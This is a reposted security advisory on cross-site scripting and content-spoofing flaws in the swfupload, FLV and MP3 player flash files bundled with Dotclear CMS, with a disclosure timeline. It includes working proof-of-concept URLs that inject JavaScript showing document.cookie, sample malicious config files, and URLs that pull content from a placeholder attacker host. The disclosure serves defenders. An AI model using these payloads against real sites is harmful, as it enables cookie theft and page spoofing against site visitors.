Lucene search
MustLive1337DAY-ID-20650HistoryApr 14, 2013 - 12:00 a.m.
Dotclear XSS Vulnerabilities
2013-04-1400:00:00
MustLive
0day.today
49
0.034 Low
EPSS
Percentile
90.4%
These are Cross-Site Scripting and Content Spoofing vulnerabilities in
Dotclear.
These are Cross-Site Scripting and Content Spoofing vulnerabilities in
Dotclear.
CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf
and player_mp3.swf.
File swfupload.swf it's Swfupload. I've wrote about vulnerabilities in
Swfupload in November 2012 (http://securityvulns.ru/docs28759.html).
SecurityVulns ID: 12719
CVE: CVE-2012-3414
File player_flv.swf it's FLV Player. I've wrote about vulnerabilities in FLV
Player in August 2011 (http://securityvulns.ru/docs26894.html).
SecurityVulns ID: 11877
File player_mp3.swf it's mp3 player similar to FLV Player (made by the same
developer).
-------------------------
Affected products:
-------------------------
Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions.
In version Dotclear 2.5 the developers fixed vulnerabilities but not
effectively: 1) all three vulnerable flash-files are exist in engine (so no
need to take them from repository or from web sites for using in own
projects, since these are vulnerable versions of flashes); 2) the developers
changed swfupload.swf in Dotclear 2.5 on previous version, but this one is
still vulnerable to all XSS and CS holes; 3) for of direct access to
flash-files (via .htaccess), to prevent using of their vulnerabilities,
works only in Apache, but not in other web servers (so web sites on them are
vulnerable).
----------
Details:
----------
Cross-Site Scripting (WASC-08):
http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Cross-Site Scripting (WASC-08):
http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt
File xss.txt:
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)
Code will execute after click. It's strictly social XSS.
Content Spoofing (WASC-12):
http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
It's possible to inject text, images and html (e.g. for link injection).
http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3
------------
Timeline:
------------
2013.01.10 - announced at my site.
2013.01.14 - informed developers about vulnerabilities in all three flashes.
2013.03.16 - released Dotclear 2.5.
2013.04.10-12 - wrote 4 additional letters to developers with reminding,
with drawing attention on ineffective fixing of the holes and with
persuading them to fix the holes correctly.
2013.04.12 - disclosed at my site (http://websecurity.com.ua/6255/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
# 0day.today [2018-03-02] #Related
seebug
seebug
Turbomail้ฎไปถ็ณป็ปXSS-1
2014-12-24 00:00:00
cve
cve
packetstorm
packetstorm
WordPress 3.3.1 swfupload.swf Cross Site Scripting
2012-11-09 00:00:00
SWF Upload Cross Site Scripting
2012-11-13 00:00:00
Dotclear 2.4.4 Cross Site Scripting / Content Spoofing
2013-04-13 00:00:00
securityvulns
securityvulns
CS and XSS vulnerabilities in SWFUpload
2013-03-11 00:00:00
XSS vulnerability in swfupload in WordPress
2012-11-18 00:00:00
XSS and CS vulnerabilities in Dotclear
2013-05-06 00:00:00
threatpost
threatpost
Issue with SWFUploader Could Lead to XSS Vulnerabilities, Content Spoofing
2013-03-12 19:10:36
Yahoo Mail Breach Linked to Old WordPress Vulnerability
2013-02-01 03:42:54
openvas
openvas
FreeBSD Ports: typo3
2012-08-10 00:00:00
TYPO3 SWFUpload movieName Cross Site Scripting Vulnerability
2014-01-02 00:00:00
prion
prion
Cross site scripting
2013-07-19 14:36:00
Cross site scripting
2012-04-21 23:55:00
Design/Logic Flaw
2022-06-30 13:15:00
typo3
typo3
Cross-Site Scripting Vulnerability in TYPO3 Core
2012-07-04 00:00:00
ubuntucve
ubuntucve
CVE-2012-3414
2013-07-19 00:00:00
CVE-2012-2399
2012-04-21 00:00:00
patchstack
patchstack
WordPress SWFUpload Plugin <= 2.2.0.1 - XSS #1
2012-06-14 00:00:00
debiancve
debiancve
CVE-2012-3414
2013-07-19 14:36:00
CVE-2012-2399
2012-04-21 23:55:00
zdt
zdt
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities
2014-01-23 00:00:00
nessus
nessus
WordPress < 3.3.2 Multiple Vulnerabilities
2012-05-09 00:00:00